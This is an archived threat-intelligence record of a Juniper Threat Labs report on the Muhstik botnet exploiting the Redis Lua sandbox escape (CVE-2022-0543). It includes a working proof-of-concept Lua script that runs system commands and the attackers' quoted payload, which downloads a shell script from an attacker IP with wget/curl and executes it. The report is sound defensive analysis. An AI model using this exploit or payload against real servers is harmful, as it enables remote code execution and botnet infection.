{
	"id": "a138e804-8af6-4b41-ad11-aaf6d93e6ed1",
	"created_at": "2026-04-06T00:19:13.597662Z",
	"updated_at": "2026-04-10T03:21:04.921834Z",
	"deleted_at": null,
	"sha1_hash": "cb125f0a1752cdc963086e2f1b6a599665b6b34b",
	"title": "Muhstik Gang targets Redis Servers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 372754,
	"plain_text": "Muhstik Gang targets Redis Servers\r\nBy Paul Kimayong\r\nPublished: 2022-03-25 · Archived: 2026-04-05 14:06:44 UTC\r\nJuniper Threat Labs has uncovered an attack that targets Redis servers using a recently disclosed vulnerability,\r\nnamely CVE-2022-0543. This vulnerability exists in some Redis Debian packages. The attack started on March\r\n11, 2022 from the same threat actor we’ve seen targeting Confluence servers back in September 2021 and the same\r\ngroup targeting Log4j back in December. The payload used is a variant of Muhstik bot that can be used to launch\r\nDDoS attacks.\r\nCVE-2022-0543: Redis Lua Sandbox Escape and Remote Code Execution\r\n“Redis is a very widely used service for caching, but it’s also used as a message broker. Clients talk to a\r\nRedis server over a socket, send commands, and the server changes its state (i.e. its in-memory\r\nstructures), in response to such commands. Redis embeds the Lua programming language as its\r\nscripting engine, which is made available through the eval command. The Lua engine is expected to be\r\nsandboxed, i.e., clients can interact with the Redis APIs from Lua, but should not be able to execute\r\narbitrary code on the machine where Redis is running.”\r\n– Reginaldo Silva\r\nhttps://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers\r\nPage 1 of 6\n\nIn January 2022, Reginaldo Silva discovered a vulnerability in Redis (Debian-specific) that allows Lua sandbox\r\nescape. A remote attacker with the ability to execute arbitrary Lua scripts could escape the Lua sandbox and\r\nexecute arbitrary code on the host.\r\nThis vulnerability existed because the Lua library in some Debian/Ubuntu packages is provided as a dynamic\r\nlibrary (Ubuntu Bionic and Trusty are not affected). When the Lua interpreter initializes, the “package” variable is\r\nautomatically populated, and that in turn permitted access to arbitrary Lua functionality.
\r\nFor instance, we can use “package.loadlib” to load modules from the “liblua” library, then use that module to\r\nexecute commands.\r\nThe following is a proof of concept on how to exploit this vulnerability.\r\nlocal io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\");\r\nlocal io = io_l();\r\nlocal f = io.popen(\"cat /etc/passwd\", \"r\");\r\nlocal res = f:read(\"*a\");\r\nf:close();\r\nreturn res\r\nTo demonstrate this attack, we instantiated a vulnerable Redis server and launched the above Lua script using the\r\n“eval” command. As you can observe from the screenshot below, we are able to achieve code execution by\r\ndumping the contents of /etc/passwd.\r\nProof of concept of executing system commands inside the Redis session\r\nPayload: Muhstik bot\r\nTimeline of attacks on CVE-2022-0543\r\nOn March 11, Juniper Threat Labs observed attacks launching this exploit from our telemetry. The attack attempts\r\nto download “russia.sh” using wget or curl from “106[.]246.224.219”. It saves it as “/tmp/russ” and executes it.\r\neval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\");\r\nlocal io = io_l();\r\nlocal f = io.popen(\"(wget -O /tmp/russ https://106[.]246.224.219/russia.sh || curl -o /tmp/russ https\r\nchmod 700 /tmp/russ; /tmp/russ\", \"r\");\r\nlocal res = f:read(\"*a\"); f:close(); return res' 0\r\nContents of russia.sh\r\nThis script (russia.sh) will further download and execute Linux binaries from 160[.]16.58.163. These binaries are\r\nidentified to be variants of Muhstik bot. 
This bot connects to an IRC server to receive commands, which include\r\nthe following:\r\nDownload files\r\nShell commands\r\nFlood attacks\r\nSSH brute force\r\nStrings inside Muhstik bot indicating its capabilities\r\nThreat Actor\r\nWe mapped the originating IP of these attacks to figure out if these are related to some groups we are tracking. We\r\nfound that the following IPs were used in the past to launch attacks:\r\n170[.]210.45.163\r\n191[.]232.38.25\r\n79[.]172.212.132\r\nFor instance, the IP 191[.]232.38.25 was used in September 2021 to launch attacks on Confluence servers\r\nexploiting CVE-2021-26084. We have documented that attack here. It’s worth noting that the group is still using\r\nthe same Muhstik bot. The same IP was again used in December to launch attacks on Apache Log4j.\r\nTimeline of observed attacks launched from 191[.]232.38.25\r\nConclusion\r\nWe advise those who may be vulnerable to patch their Redis service. Debian and Ubuntu have also released\r\nsecurity advisories regarding this matter. 
Links are below:\r\nDebian Advisory\r\nUbuntu Advisory\r\nIndicators of Compromise\r\nReference:\r\nhttps://github.com/vulhub/vulhub/tree/master/redis/CVE-2022-0543\r\nhttps://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce\r\nSource: https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers"
	],
	"report_names": [
		"muhstik-gang-targets-redis-servers"
	],
	"threat_actors": [],
	"ts_created_at": 1775434753,
	"ts_updated_at": 1775791264,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cb125f0a1752cdc963086e2f1b6a599665b6b34b.pdf",
		"text": "https://archive.orkl.eu/cb125f0a1752cdc963086e2f1b6a599665b6b34b.txt",
		"img": "https://archive.orkl.eu/cb125f0a1752cdc963086e2f1b6a599665b6b34b.jpg"
	}
}